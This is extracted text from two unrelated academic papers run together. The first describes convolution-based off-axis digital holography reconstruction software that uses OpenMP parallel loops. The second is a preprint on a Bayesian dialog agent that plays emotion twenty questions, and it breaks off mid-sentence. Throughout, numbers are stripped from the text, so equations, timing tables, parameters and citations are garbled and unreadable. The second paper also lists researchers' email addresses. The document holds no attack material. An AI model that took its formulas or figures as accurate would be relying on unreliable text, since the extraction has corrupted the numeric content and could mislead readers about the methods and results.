a wide range of applications in displaying the surface morphology of three-dimensional objects. there have been many studies on the physical methods and implementation methods of digital holography. one of the main problems at present is to design a stable and fast reconfiguration software. this paper analyzes the basic principle of convolution based off-axis digital holographic reconstruction, and presents the process of d reconstruction of off-axis digital holography. the d reconstruction software of digital holography is designed and developed according to the basic principle and the process of reconstruction, and the parallel operation of d reconstruction is realized by openmp. results show that the software can help researchers conveniently realize digital holographic three-dimensional reconstruction. the reconstructed parameters can be adjusted according to the requirements, and the spectra, intensity maps, phase maps and other information required in the reconstruction process can be obtained. the software meets the needs of digital three-dimensional reconstruction. keywords-digital holography; three-dimensional reconstruction; parallel computing; software design i. introduction digital holography has wide application prospects in the field of three-dimensional surface deformation measurement [ ], particle field test [ ], flow field measurement [ ], biological sample microscopic measurement [ - ]. at present, a lot of research on the algorithms and applications of digital holography has been carried out. in the early stage, the single fourier transform algorithm is widely used, and this algorithm can reproduce the pixel size and the reproduction distance. now based on the fast fourier transform convolution, angular and fresnel methods for phase unwrap and numerical compensation for a lot of improvements [ - ]. in order to carry out the required reconstruction in the research of digital holography conveniently and quickly, in this paper, based on the reconstruction principle used in d reconstruction of digital holography, a digital holographic d reconstruction software is designed and developed according to the reconstruction process. ii. reconstruction principle the principle of digital holography is the same as that of traditional optical holography. it is divided into the recording and reproducing process of matter and light wave, which are realized by the interference principle and diffraction principle of light. digital holographic reconstruction is to process the digital hologram to obtain the object information. for off-axis holography, we need to record the object information in the form of interference fringes by off-axis physical optical path, and use the interference principle to record the object information in the form of an image through a ccd camera to form a hologram. according to different measurement objects and recording conditions, digital holographic methods mainly include convolutional reconstruction algorithm and fresnel diffraction integral reconstruction algorithm. the software uses a convolution method. according to convolution theory, the complex amplitude of the object light,  ,u x y can be expressed in the following formula according to the intensity of interference fringes, the intensity of reference light and the impulse response function.     , { [ ( , )( , )] [ ( , , , )]}u x y f f h x y c x y f h x y in the formula,  ,h x y is a hologram,  ,c x y is a reference light,   , , ,h x y is a impulse response function, which is related to a specific physical optical path. the calculation method is as follows:                        exp( ( ) ( ) , , , ( ) ( ) ( , ) jk z x y h x y j z x y h x y in the formula, λ is wavelength. the block diagram of the algorithm is shown in figure . h(x,y) c(x,y) x fourier transform f(h(x,y)) x fourier inverse transform u(x,y) figure . block diagram of convolution the complex amplitude of the object light can be obtained by the above method. the complex amplitude of the object light carries the three-dimensional information of the object. if the object fluctuates beyond the wavelength range, it needs to be unwrapped to extract the three- dimensional distribution information of the object. in the process of digital holographic reconstruction, there are usually three ways:( ) fresnel transform diffraction international conference on sensor network and computer engineering (icsnce ) method ( ) fourier transform filter method ( ) fresnel wavelet transform method. the software uses the method ( ). fourier transform filter method directly to digital hologram fourier transform, and then in the fourier domain using filtering, frequency shift and other methods to remove the zero-order spectrum and the spectrum of conjugation, and then inverse fourier transform. phase unwrapping is to achieve an important part of d reconstruction of digital holography. the minimum norm method is a kind of algorithms which are widely used at present, of which there are four typical algorithms. ( ) least square method based on fast fourier transform ( ) least square method based on discrete cosine transform ( ) least square method based on transverse shear interference ( ) preconditioned conjugate gradient method. the software uses the method ( ) to unwrap the phase diagram. the least square method based on fast fourier transform the basic steps are as follows: ( ) the package phase  ,i j even periodic extension, get y  ,i j ; ( ) calculated               , , , , , ( ) ( ) x x y y i j i j i j i j i j , among them       , , , x i j i j i j ,       , , , y i j i j i j ; ( ) perform a two-dimensional fft on  ,i j to get , ˆ i j p ; ( ) find     , , ˆ ˆ /[ cos( / ) cos( / ) ] i j i j f p i m j n ( ) perform the two-dimensional ifft transform on , ˆ i j f to obtain the true phase value  , ˆ i j after the period extension, take    , , ˆ i j i j iii. software design a. refactoring process digital holographic reconstruction software reconstruction process shown in figure . the object of digital holographic processing is the hologram collected by reconstructing the hardware system. according to the different components of the reconstructed hardware system, the first need to multiply the hologram with the reference light. for the case of reference light for plane light, this step can be omitted. after getting the spectrum, you will find the spectral distribution of the information contained in the spectrum near the center of the positive and negative level, the strongest in the image center of the zero-level there is no object information. therefore, the need for frequency selection and frequency shift. frequency selection is to choose a positive or negative level of the spectrum area. the frequency shift is to move the positive first-order or negative-order spectrum center to the image center. according to the need to reconstruct the hologram, frequency spectrum processing for frequency shift. besides shifting the frequency spectrum to the center of the circle, we can see clearly that there is another advantage besides the image frequency distribution. it can separate the periodic interference signals. after the frequency-shifted image is obtained, the transfer function is multiplied with the frequency shifted image, and the product of the two is inverse fourier transformed. the inverse transform image is a complex image. the phase contains the information of the object. in this case, the phase - pi needs to be unwrapped. holog ram reference light x fourier transform spectrum diag ram frequency shift frequency shift after frequency shift transfer function diag ram inverse fourier transform x plural function diag ram unwrapping phase diag ram unwrap the phase diag ram object elevation data linear transformation figure . digital holographic d reconstruction process after unwrapping the phase represents the actual object elevation, the phase information of the object can be obtained according to the calibration value. the reconstruction algorithm of the three dimensional digital holography is a complicated and time-consuming process. in addition, in the process of reconstruction, the user is generally required to select the appropriate spectrum area and set the reconfiguration parameters such as the reconfiguration distance and wavelength. therefore, in the design of software, multi-threaded design ideas. work interface using interface thread, reconstruction algorithm for worker threads. international conference on sensor network and computer engineering (icsnce ) b. parallel processing algorithm in the process of d reconstruction of digital holography, a lot of image processing is needed. parallel processing algorithm is needed to improve the speed of operation, so as to improve the real-time performance of d reconstruction of digital holography. this paper uses openmp technology to realize parallel operation. openmp is led by the openmp architecture review board and is widely accepted. t is a set of guiding compilation and processing scheme (compiler directive) for multi thread programming for shared memory parallel system. because the reconstruction process of digital holography for every image needs sequential execution, it can not parallel operation of different stages of reconstruction process. the task of each process can only be processed in parallel. from the processing flow, it can be seen that the sub tasks are basically the processing of the complex number or the real image. therefore, this paper uses the parallel processing method for the loop operation, and only needs to add the following openmp compilation instructions before the for statement which needs parallel operation: #pragma omp parallel for schedule(kind,[size]) among them kind represents a pattern, and there are three patterns in all , they are static 、 dynamic and guided。the static mode for each thread to allocate size cycle tasks, according to the number of threads to complete the task allotment. if the size value is too large, it may cause some heavy kernel tasks, and some kernels do not have the task. in dynamic mode, the size cycle task is also assigned to each kernel on the surface, but the allocation process is dynamic. which kernel is idle to give it a size distribution cycle tasks. in guided mode, each kernel is assigned tasks in descending order, allocating more tasks first, and then gradually reducing the tasks, the minimum task size cycle. if no size is specified in all the above modes, the default value is . in order to detect the running speed of parallel algorithm and all kinds of parallel operation modes, the running time of software is tested on desktop equipped with amd phenom ii x t six core processor. the resolution of the hologram is x . the reconstruction of holograms is done during the test, and the mean and variance of the reconstructed time are calculated, as shown in table . table i. reconfiguration time for different parallel modes parallel mode times variance none . . static, . . dynamic, . . guided, . . static, . . dynamic, . . guided, . . from the above test results, we can see that when the parallel processing algorithm is not adopted, the average time of each reconstruction is . s, which is about . times parallel algorithm. for different parallel algorithm patterns, the average reconfiguration time is almost the same and the variance has small difference. iv. processing results based on the above reconstruction algorithm, the d reconstruction software of digital holography is developed by using c++ language. in order to verify the effect of the software, a part of the hologram is reconstructed. as shown in figure , the main parameters of the microlens array hologram are as follows: wavelength( nm), pixel size( . um), sample refractive index( . ), reconstruction distance( mm) figure . microlens array hologram the reconfiguration of the hologram is based on the above reconfiguration parameters, and the result of the reconfiguration is shown in figure . figure . reconstructed image of microlens array figure shows a hologram of a cross object with a wavelength of . nm, a pixel size of . um, and a reconfiguration distance of . mm. international conference on sensor network and computer engineering (icsnce ) figure . cross structure hologram the reconstructed d image is shown in figure . figure . cross structure reconstructed image the d reconstruction software of digital holography can not only display the d reconstruction map, but also display the original phase map, frequency spectrum, intensity map, phase map and d reconstruction map according to the requirements. users can set reconfiguration parameters according to needs, select positive and negative primary centers and reconstructed areas in the center of spectrum, and reconstruct results and process data can be saved in images or data. the software interface is shown in figure . figure . software interface v. conclusion this paper analyzes the basic principle of the reconstruction of off-axis digital holography based on convolution. according to this principle, the d reconstruction process of off-axis digital holography is given, and the d reconstruction software of digital holography is designed and developed. in order to improve the running speed of d reconstruction, the parallel operation of d reconstruction is realized by using openmp technology. the various implementations of openmp parallel computing methods were analyzed comparatively. the results show that the average time is basically the same as the reconstruction of various parallel mode, but the variance of guided model is relatively smaller. finally, the partial hologram is reconstructed by using this software. the result shows that the software can fulfill the requirement of d reconstruction of digital holography, and has good practicability. it solves the functional integration needed in digital holography reconstruction, and facilitates the process of digital holography. acknowledgments the work described in this paper was fully supported by special scientific research project of shaanxi provincial education department( jk ), and shaanxi province new network and testing and control engineering laboratory project. and state and provincial joint engineering laboratory of advanced network and monitoring conrrol(anmc) fund project(gsysj ). reference [ ] kim myung k, parshall daniel phase imaging digital holography for biological microscopy. proc of spie, , : ~ [ ] c. b. lefebvre, s. coëtmellec, d. lebrun, et al. application of wavelet transform to hologram analysis: three dimensional location of particles[j]. opt. laser eng., , ( ): - [ ] j. desse, p. picart, p. tankam. digital three-color holographic interferometry for flow analysis[j]. opt. express, , ( ): - . [ ] m.k. kim. application of digital holography in biomedical microscopy. j.opt. soc.korea, , ( ): - . [ ] u. schnar and w. juptner, digital recording and numereical reconstruction of holograms, meas. sci. technol, , :r -r . [ ] zhang yi zhuo, wang da yong, zhao jie, wan yu hong, jiang zhu qing, tao shi quan. research on practical phase unwrapping algorithm in digital holography [j]. journal of optics. . ( ): - . [ ] zhang zhi hui, wang hua ying, liu zuo qiang, huangmin, liu fei fei, yu meng jie, zhao bao qun. phase unwrapping algrithms based on fast four transform. laser & optoeelectronics progress, , ( ): - ~ . a socratic epistemology for verbal emotional intelligence a peer-reviewed version of this preprint was published in peerj on january . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. kazemzadeh a, gibson j, georgiou p, lee s, narayanan s. . a socratic epistemology for verbal emotional intelligence. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. a socratic epistemology for verbal emotional intelligence abe kazemzadeh, james gibson, panayiotis georgiou, sungbok lee, shrikanth narayanan we describe and experimentally validate a question-asking framework for machine-learned linguistic knowledge about human emotions. using the socratic method as a theoretical inspiration, we develop an experimental method and computational model for computers to learn subjective information about emotions by playing emotion twenty questions (emo q), a game of twenty questions limited to words denoting emotions. using human- human emo q data we bootstrap a sequential bayesian model that drives a generalized pushdown automaton-based dialog agent that further learns from human-computer dialogs collected on amazon mechanical turk. the human-human emo q dialogs show the capability of humans to use a large, rich, subjective vocabulary of emotion words. training on successive batches of human-computer emo q dialogs shows that the automated agent is able to learn from subsequent human-computer interactions. our results show that the training procedure enables the agent to learn a large set of emotions words. the fully trained agent successfully completes emo q at % of human performance and % better than the bootstrapped agent. even when the agent fails to guess the human opponent's emotion word in the emo q game, the agent's behavior of searching for knowledge makes it appear human-like, which enables the agent maintain user engagement and learn new, out-of-vocabulary words. these results lead us to conclude that the question-asking methodology and its implementation as a sequential bayes pushdown automaton are a successful model for the cognitive abilities involved in learning, retrieving, and using emotion words by an automated agent in a dialog setting. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts a socratic epistemology for verbal emotional intelligence abe kazemzadeh, james gibson, panayiotis georgiou, sungbok lee, shrikanth narayanan signal analysis and interpretation laboratory university of southern california, los angeles, usa abstract we describe and experimentally validate a question-asking framework for machine-learned linguistic knowl- edge about human emotions. using the socratic method as a theoretical inspiration, we develop an experi- mental method and computational model for computers to learn subjective information about emotions by playing emotion twenty questions (emo q), a game of twenty questions limited to words denoting emo- tions. using human-human emo q data we bootstrap a sequential bayesian model that drives a generalized pushdown automaton-based dialog agent that further learns from human-computer dialogs collected on amazon mechanical turk. the human-human emo q dialogs show the capability of humans to use a large, rich, subjective vocabulary of emotion words. training on successive batches of human-computer emo q dialogs shows that the automated agent is able to learn from subsequent human-computer interactions. our results show that the training procedure enables the agent to learn a large set of emotions words. the fully trained agent successfully completes emo q at % of human performance and % better than the boot- strapped agent. even when the agent fails to guess the human opponent’s emotion word in the emo q game, the agent’s behavior of searching for knowledge makes it appear human-like, which enables the agent maintain user engagement and learn new, out-of-vocabulary words. these results lead us to conclude that the question-asking methodology and its implementation as a sequential bayes pushdown automaton are a successful model for the cognitive abilities involved in learning, retrieving, and using emotion words by an automated agent in a dialog setting. . introduction epistemology is the branch of philosophy that deals with knowledge and belief. according to basic results in epistemology, knowledge is defined as true, justified belief. this paper was inspired by reflecting on how humans justify their beliefs about emotions. this reflection led to a experimental method for collecting human knowledge about emotions and a computational model that uses the collected knowledge in an automated dialog agent. the logician charles s. peirce identified three types of thought processes by which a person can justify their beliefs and thereby acquire knowledge: induction, deduction, and hypothesis (peirce, ). whereas email addresses: abe.kazemzadeh@gmail.com (abe kazemzadeh), jjgibson@usc.edu (james gibson), georgiou@sipi.usc.edu (panayiotis georgiou), sungbokl@usc.edu (sungbok lee), shri@sipi.usc.edu (shrikanth narayanan) peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts induction is primarily involved with observational data, deduction and hypothesis have a linguistic, propo- sitional component. the third of these, hypothesis (also known as abduction (eco and sebeok, )), has been compared with the socratic method of questioning-asking dialogs (hintikka, ). the socratic method was named after the ancient greek philosopher socrates who applied his method of inquiry to examine concepts that seem to lack any concrete definition, in particular some of the complex moral and psychological concepts of his time like “justice”, “knowledge”, “piety”, “temperance”, and “love”. we claim that this method of inquiry can shed light on how people justify beliefs about emotional concepts, which also seem to defy concrete definition. question-asking allows people to learn about things without directly experiencing them. since a computer agent cannot directly experience emotions as a human would, question-asking can be leveraged for the computer agent to learn about emotional concepts. question-asking has also been proposed as a stage in child development resposible for rapid learning and language acquisition (frazier et al., ). likewise, a computer agent can use question-asking to acquire knowledge and vocabulary. we call the approach of using question-asking to interactivly acquire linguistic knowledge about emotion by a computer dialog agent a socratic epistemology for verbal emotional intelligence. the knowledge acquired by the socratic epistomology for verbal emotional intelligence is an informal, social type of knowledge. this informal knowledge about emotions is important because although there has been much recent progress toward understanding the underlying biological basis for emotion, humans have been able to understand emotions informally since ancient times. we call this informal, language-based understanding of emotions natural language description of emotion (kazemzadeh, ). natural language descriptions of emotion are utterances that refer to emotions, as opposed to utterances that express emotions. this phenomenon can be seen as a specific subset of the larger phenomenon of emotional language, which also includes emotion or sentiment expressed towards some object, vocal modulation due to emotion, and persuasion and pragmatics. studying language that deals with referential statements about emotions is a novel focus that is distinct from the prevailing trends of studying the expressive characteristics of emotional language. the framework we present also differs from other computational theories of emotion in that it aims to study how people describe emotions, rather than how emotions should be described. as such, it can be seen as a descriptive, rather than prescriptive, theory, and hence has commonalities with sociological studies of emotions (king, ; shaver et al., ; mihalcea and liu, ; kamvar and harris, ; kazemzadeh et al., ) and crowd-sourcing. although there is clearly a biological basis for emotions, the way that people describe emotions in natural language varies over time from culture to culture and person to person. a descriptive theory of how people describe emotions in natural language should reflect this variation. thus, a particular instantiation of a theory of natural language description of emotion should be relative to a peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts particular agent or set of agents at a given time who hold similar beliefs and communicate using the same language. rather than trying to establish a single, particular definition for emotion words, we study how shared meaning can be established through natural language dialog behavior even when people and agents may have different ways of experiencing and their describing emotions. the key goals of this paper are to use question-asking to observe natural language descriptions of emotion in the context of interactive dialogs and to computationally model the communicative behavior that supports the referential link between language and emotions. to do this, we use an experimental game called emotion twenty questions (emo q). emo q is played like the traditional game of twenty questions, except that one player, the answerer, must choose a word that names an emotion. the other player, the questioner, must try to guess the emotion that the answerer picked by posing a series of twenty or fewer questions. importantly, we do not restrict the set of emotion words that the players can choose nor the questions they can ask: the set of emotion words and questions is not limited except by the players’ judgment and cooperation. an example of a human-computer emo q game is given below: agent: let me know when you have picked an emotion word. user: ok agent: is it very intense? user: no agent: is it positive? user: yes agent: is it an emotion that just pops up spontaneously (vs being triggered by something)? user: depends agent: is it caused by anything in particular user: well, yes, you need the right conditions agent: is it relaxation? user: yes agent: so did i get it right? user: yes, you got it. agent: awesome! would you like to play again? user: no, thanks. agent: thank you for playing the data from the human-human emo q games allows us to observe what words people consider to denote emotions, what questions people ask about emotions, what factors determine the length of question/answer exchanges, and what is the probability that the emotion words will be correctly guessed. these results are used to create the computer agent and test its performance with respect to human performance. for the peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts automated agent presented in this paper, we focused on the case where the computer agent plays the role of the questioner while future work for an answerer agent is discussed in section . the paper is organized as follows. section discusses the motivations and theory behind our work. section describes the computational model and algorithm we used to create an emo q questioner agent. section discusses experiments we conducted of humans and computers playing emo q. section describes the results of testing the agent. finally section and section propose future work and provide discussion and links to open source software implementations. . background . . natural language descriptions of emotions just as memory addresses, variables, and urls refer to electronic resources for computers, so do words and descriptions identify objects, both physical and conceptual, for humans. when processing natural language by computer, it can help to draw upon these similarities. this is especially helpful in the case of affective computing, when the objects we wish to refer to, emotions, are abstract and subjective. in this paper we make a distinction between the emotion expressed by the speaker and the emotion referred to by the speaker. currently there has been a great degree of interest in automatically analyzing emotional expression in language. the goal of such analysis is to determine emotions expressed by the speaker or writer, i.e., the emotions that the speaker currently feels. the language used as input to this kind of analysis can be a speech recording or textual representation of language. however, automatically analyzing the emotions expressed in an utterance or document is problematic when a speaker refers to emotions that are not his or her own current emotions. some examples of this include quotations, storytelling/gossip, counterfactual reasoning, post facto emotional self-report, and abstract references to emotions. he said that he was mad. (quotation) did you see how mad john was? (gossip) if you eat my ice cream, i will get mad. (counterfactual) i was mad when my car got stolen last year. (self-report) anger is one of the seven sins. (abstract reference). in these examples, a naïve automated analysis would detect anger, but in fact the writer of these sentences is not actually feeling anger at the current time. in many cases, such as task-driven dialogs like ordering airline tickets from an automated call center, this distinction might not be pertinent. however, for open-ended dialog systems the distinction between expression and reference of emotions could be relevant, for example an automated agent for post-traumatic stress disorder therapy. the study of natural language descriptions of emotions brings the distinction between emotion expression and reference into focus. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts the ability to talk about things beyond the here-and-now has been termed displacement (hockett and altmann, ). displacement is an important characteristic that distinguishes human language from animal communication. in the context of this research, the ability talk about an emotion without it being physically present is a key component of natural language description of emotion. natural language description of emotion has been examined in ethnography, comparative linguistics, and cognitive science and it is beginning to be studied in the domain of natural langauge processing (king, ; zoltán kövecses, ; rolls, ; kazemzadeh et al., ). at the most basic level, natural language description of emotion includes words that name emotions, e.g. angry, happiness, etc. however, due to the productive, generative nature of natural language, it is possible to refine and generalize emotion descriptions with longer natural language phrases. in order to communicate using natural language descriptions of emotions, people must be able to come to a shared understanding about the meaning of these descriptions. russell ( ) introduced the notion of definite descriptions, a logical device to used to model unique reference in the semantics of languages, both formal and natural. in this paper, we focus on the natural language definite descriptions. common examples of natural language definite descriptions are proper names and noun phrases with the definite article “the”. indefinite descriptions, on the contrary, are prefaced with indefinite articles, such as “a”, “some”, or “every”. we maintain that natural language descriptions of emotions are definite descriptions when they are used in natural language interaction that terminates in mutual agreement. by considering terms that refer to emotions as definite descriptions, we are trying to capture the intuition that different people mean the same things when they use the same emotion terms. in barrett ( ), the question is posed of whether emotions are natural kind terms, to which the paper answered no, i.e., that emotion words in general represent non-unique classes of human behavior rather than fundamentally distinct biological classes. the question of whether emotion terms are definite descriptions can be seen as a less stringent criterion than that of whether they are natural kinds. in this paper, we apply the notion of definite descriptions to capture the experimental data which indicates that there is a high degree of consensus about how emotions are described when measured by successful outcomes in human-human emo q. . . emo q, crowd-sourcing, and experimental design the game of emo q was designed as a way to elicit natural language descriptions of emotion. posing the experiment as a game leverages past results in crowd-sourcing and games with a purpose. from the perspective of natural language processing, the emo q game can be seen as a wizard of oz experiment that collects human behavior to train the behavior of an automated agent. games like emo q can be seen as games with a purpose (von ahn and dabbish, ) whose purpose is crowd-sourcing (howe, ) the collective knowledge and beliefs of the players (kazemzadeh et al., ). the phenomenon of crowd-sourcing is closely tied to the emergent properties of online social communities (zhong et al., ). peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts by relying on the wisdom of the masses, we venture a simple answer to the difficult question, “what is emotion?”. the answer, according to crowd-sourcing, is that emotion is what people say it is. although this answer side-steps many important issues, such as physiological and psychological descriptions of emotions, it does bring other issues into sharper focus. there has been a trend toward studying non-prototypical emotional data (mower et al., ). non-prototypical emotional data is exemplified by disagreement among annotators when assigning emotional labels to data. we argue that our methodology provides a crowd- sourced description of emotions that can effectively deal with non-prototypical emotions. to avoid falling into the ad populem logical fallacy, we formulate the answer to the question “what is emotion?” not as a question of truth, but a question of knowledge and belief, i.e., an issue of epistemology as described in section , in effect skirting the question of ground truth, but asking other interesting questions: “what do people believe about emotions, how do they express these beliefs in language, and how do they justify their beliefs through question-asking behavior?” annotation tasks can be seen as a type of crowd-sourcing to find consensus about assigning emotionl labels to data. elicitation of subjects also has aspects of crowd-sourcing to experimentally observe a diversity of emotional behavior in response to experimentally controlled stimuli. it can be argued that compared with annotation and elicitation of emotional data emo q provides higher experimental validity and sensitivity and less experimental bias at the expense of experimental control and reliability. in terms of experimental design, the human-human emo q is a quasi-experiment or natural experiment, as opposed to a controlled experiment, which means that there is not a manipulation of variables made by the experimenters, but rather that these variables are observed as they vary naturally within the system. with annotation and elicitation tasks, experimenters can control the vocabulary of annotation labels and with elicitation tasks experimenters can control the stimuli that are presented. with this control, experiments are more easily repeated. in emo q, we did not control what emotion words or questions the subjects picked so for another population the results could vary, leading to less experimental reliability. however, trading off control and reliability leads to more experimental sensitivity and validity and less experimental bias. in emo q subjects can choose any words or questions they want and they communicate in a natural dialog setting. this way of characterizing emotion is closer to natural communication and more sensitive to nuances of meaning. when forced to annotate using a fixed vocabulary of emotion words, subjects are experimentally biased toward using that vocabulary. the automated dialog agent is one way to enforce more experimental control for emo q. because the agent’s behavior is programmed we can use this as a way to better control and replicate experiments. another way we aimed to improve experimental reliability is by prompting users to pick emotion words from three different difficulty classes. sections and further describe the computational model for the agent’s behavior and our experimental design. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts . model bayesian models have been successfully applied to a wide range of human cognitive abilities (griffiths et al., ), including inductive inference of word meaning from corpora (steyvers et al., ) and experi- mental stimuli (xu and tenenbaum, ) and powering affective dialog agents (carofiglio et al., ). to our knowledge, this work is the first application of bayesian cognitive models for learning emotion words from dialog interaction. the model we use for the emo q questioner agent is a sequential bayesian belief update algorithm. this model fits the framework of socratic epistemology, as described in the introduction, because it combines the notion of belief and question-asking. intuitively, this algorithm instantiates an agent whose semantic knowledge is based on data from previous emo q matches. the agent begins a new match of emo q with a uniform belief about the emotion word to be guessed. based on the previous semantic knowledge, the agent asks questions and updates its belief based on each observation of the user’s answers to the questions. while the emo q match is played, the observations are stored in the agent’s episodic buffer (baddeley, ), also known as working memory. after the match, the agent updates its semantic knowledge using the results of the match, clears its episodic buffer, and is then ready to play again. the words in italics are high-level abstractions used to create a cognitive model for the agent, which is underlyingly implemented as a sequential bayesian statistical model. we ask that the reader keep this abstraction in his or her episodic buffer when reading the following description of the model’s technical implementation. the semantic knowledge described above is the conditional probability of observing a set of question- answer pairs given a hidden variable ranging over emotion words. this conditional probability distribution is estimated from the corpus of past human-human and human-computer emo q matches as follows. let e be the set of emotion words and let ε ∈ e be this categorical, bayesian (i.e., unobserved) random variable distributed over the set e. the probability of ε, p(ε) is the belief about the emotion word to be guessed. each question-answer pair from the match of emo q is considered as an observation or feature of the emotion being predicted. thus if q is the set of questions and a is the set of answers, then a question q ∈ q and an answer a ∈ a together compose the feature f = (q, a), i.e. f ∈ q × a. the conditional probability distribution, p(f|ε), which represents semantic knowledge, is estimated from the training data using a smoothing factor of . to deal with sparsity. in this model we stipulate that the set of answers a are four discrete cases: “yes”, “no”, “other”, and “none”. when the answer either contains “yes” or “no”, it is labeled accordingly. otherwise it is labeled “other”. the feature value “none” is assigned to all the questions that were not asked in a given dialog. “none” can be seen as a missing feature when the absence of a feature may be important. for example, the fact that a certain question was not asked about a particular emotion may be due to the fact that that question was not relevant at a given point in a dialog. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts similarly, we stipulate that the questions can be classified into some discrete class that is specified through a semantic expression derived from the annotation of questions, as described in section . . for example, the question “is it a positive emotion?” is represented as the semantic expression “e.valence==positive”. if the an- swer to this question was “maybe”, the resulting feature would be represented as (‘e.valence==positive’,‘other’). using bayes rule and the independence assumption of the naïve bayes model, we can formulate the agent’s belief about the emotion vector ε after observing features f ...ft, in one single batch, as opposed to sequentially (which will be formulated next): p(ε|f , ..., ft) = qt i= [p(fi|ε)] p(ε) qt i= p(fi) . ( ) this is simply the formulation of naïve bayes, where in this case p(ε) is the prior probability of a player choosing a specific emotion word, qt i= [p(fi|ε)] is the likelihood of seeing question-answer pairs given specific emotion words, and qt i= p(fi) is the probability of observing question-answer pairs in general. in terms of the high-level cognitive model, the set of observational feature vector f ...ft is what was described as the agent’s episodic buffer. p(f|ε) is the agent’s semantic knowledge that relates question- answer features to emotion words. p(ε) and p(ε|f , ..., ft) are the agent’s initial/prior and final/posterieor beliefs, respectively. in equation , the posterior belief of the agent of emotion ek at time t, p(ε = ek|f , ..., ft) is computed only after the agent has asked all t questions. this model is known as naïve bayes. in contrast the sequential bayes model that we use is dynamic: the agent updates its belief at each time point based on the posterior probability of the previous step, i.e., at time t p(ε|f , ..., ft) = p(ft|ε)p(ε|f , ..., ft− ) p(f , ..., ft) when the game begins, the agent can start with a uniform prior on its belief of which emotion is likely or it can use information obtained in previously played games. in the experiments of this paper, we use a uniform prior, p(ε = ek) = /|e|, ∀k = ...|e|. we chose to use the uniform prior to initialize the agent because our training data contains many single count training instances and because we want to examine how the system performs with less constraints. we introduce a new variable βt,k = p(ε = ek|f , ..., ft) for the agent’s belief about emotion k at time t and postulate that the agent’s prior belief at a given time is the posterior belief of the previous step. then, the agent’s belief unfolds according to the formula: β ,k = p(ε = ek) = /|e| β ,k = p(f |ε = ek) p(f ) β ,k βt,k = p(ft|ε = ek) p(f , ..., ft) βt− ,k ( ) peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts decomposing the computation of the posterior belief allows the agent to choose the best question to ask the user at each turn, rather than having a fixed battery of questions. we define “the best question” at time t to be the question that is most likely to have a “yes” answer given the posterior belief at time t − , p(ε|f , ..., ft− ): argmaxq∈q p((q, ‘yes’))|ε)p(ε|f , ..., fi− ) this next-question criterion is a heuristic motivated by considering “yes” answers to be positive feedback that the agent is on the right track. while this heuristic worked well in practice, other next-question criteria are certainly possible and this is an area for future research. at time t the agent asks the best question and takes the user’s response as input. it then parses the input to classify it into one of {“yes”, “no”, “other”}. this information is then used to update the agent’s posterior belief βt+ ,k about each emotion ek ∈ e, which will then be used as the prior in the following step. the unfolding of variable β in equation models the update of belief as it is justified by the agent’s question-asking and the user’s answers. it is this computational model of question-asking and belief update that represents the socratic epistemology for verbal emotional intelligence in a software agent. table shows an example interaction between the automated emo q questioner agent and a human user, along with a trace of the agent’s belief state that shows the justification of beliefs by question-asking. identity questions are a special type of question where the agent makes a guess about the emotion. identity questions are chosen with the same best question criteria as other questions but trigger a transition to a different dialog state. an affirmative answer to an identity question (e.g., “is it happy?”) means that the agent successfully identified the user’s chosen emotion. any other answer to an identity question will set the posterior probability of that emotion to zero because the agent can be sure it is not the emotion of interest. the pseudo-code for the main loop of the adaptive bayesian agent is shown in algorithm . this auto- mated, data-driven component was framed within a manually designed dialog graph, as shown in figure . the dialog graph is implemented as a generalized pushdown transducer. recall that a pushdown transducer is an transducer that can determines it output symbol and next state based on its current state, the input symbol, and the top of its stack (allauzen and riley, ). a generalized pushdown transducer is a push- down transducer that is not limited to only the top of the stack when determining the output and next state. this aspect is important in the question asking loop because the stack represents the episodic memory, which stores the question-answer observations. otherwise, the agent could be implemented as a plain pushdown transducer. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts algorithm sequential bayesian emo q agent. f is the observed question-answer features, e is the set of previously seen emotion words, p(f|ε) is the semantic knowledge relating the observed question-answer pairs to emotion words, and βt,k is the belief about the emotion word indexed by k at time t. because the agent is playing a twenty questions game, d is set to , but this could be changed for the agent to generalize to different question-asking tasks. input: f = q × a, e, and p(f|ε) β ,k ← /|e|, ∀k = ...|e| for i = to d do q(i) = argmax q∈q p((q, ‘yes’)|ε)p(ε|f , ..., fi− ) print q(i) a(i) ← user’s input answer fi ← (q (i), a(i)) βi,k ← βi− ,k · p(fi|ε = ek)/p(f , ..., fi), ∀k = ...|e| if (q(i) is identity question for ek ∧ a (i) = ‘yes’ ) then return: e∗ = ek end if if (q(i) is identity question for ek ∧ a (i) = ‘no’) then βi,k ← end if end for k∗ ← argmax k∈ ...|e| [βi,k] e∗ ← ek∗ return: most likely emotion given observations: e∗ peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts figure : dialog graph for the emo q questioner agent. the loop labelled “asking” represents the functionality described by the sequential bayesian belief model of equation and algorithm . the dialog graph is implemented as a generalized pushdown automaton, where the stack represents the agent’s working memory of question-answer turns. . experiments the emo q experiments we conducted can be partitioned into human-human and human-computer experiments. section . will examine the data from human-human experiments, which was the initial corpus used to train the emo q question-asking agent. section . will focus on experiments with the question-asking agent described in section . . . human-human emo q the human-human emo q results are described in an earlier conference paper (kazemzadeh et al., ) but we include a brief description because it is important for understanding the development of the automated agent. we collected a total of matches from players in the human-human experiments in which emo q was played over text chat. the emo q experiment was implemented as an online chat application using the extensible messaging and presence protocol (xmpp) and logged so that the games can be easily recorded and studied. early in our pilot studies, we realized that it was difficult to successfully 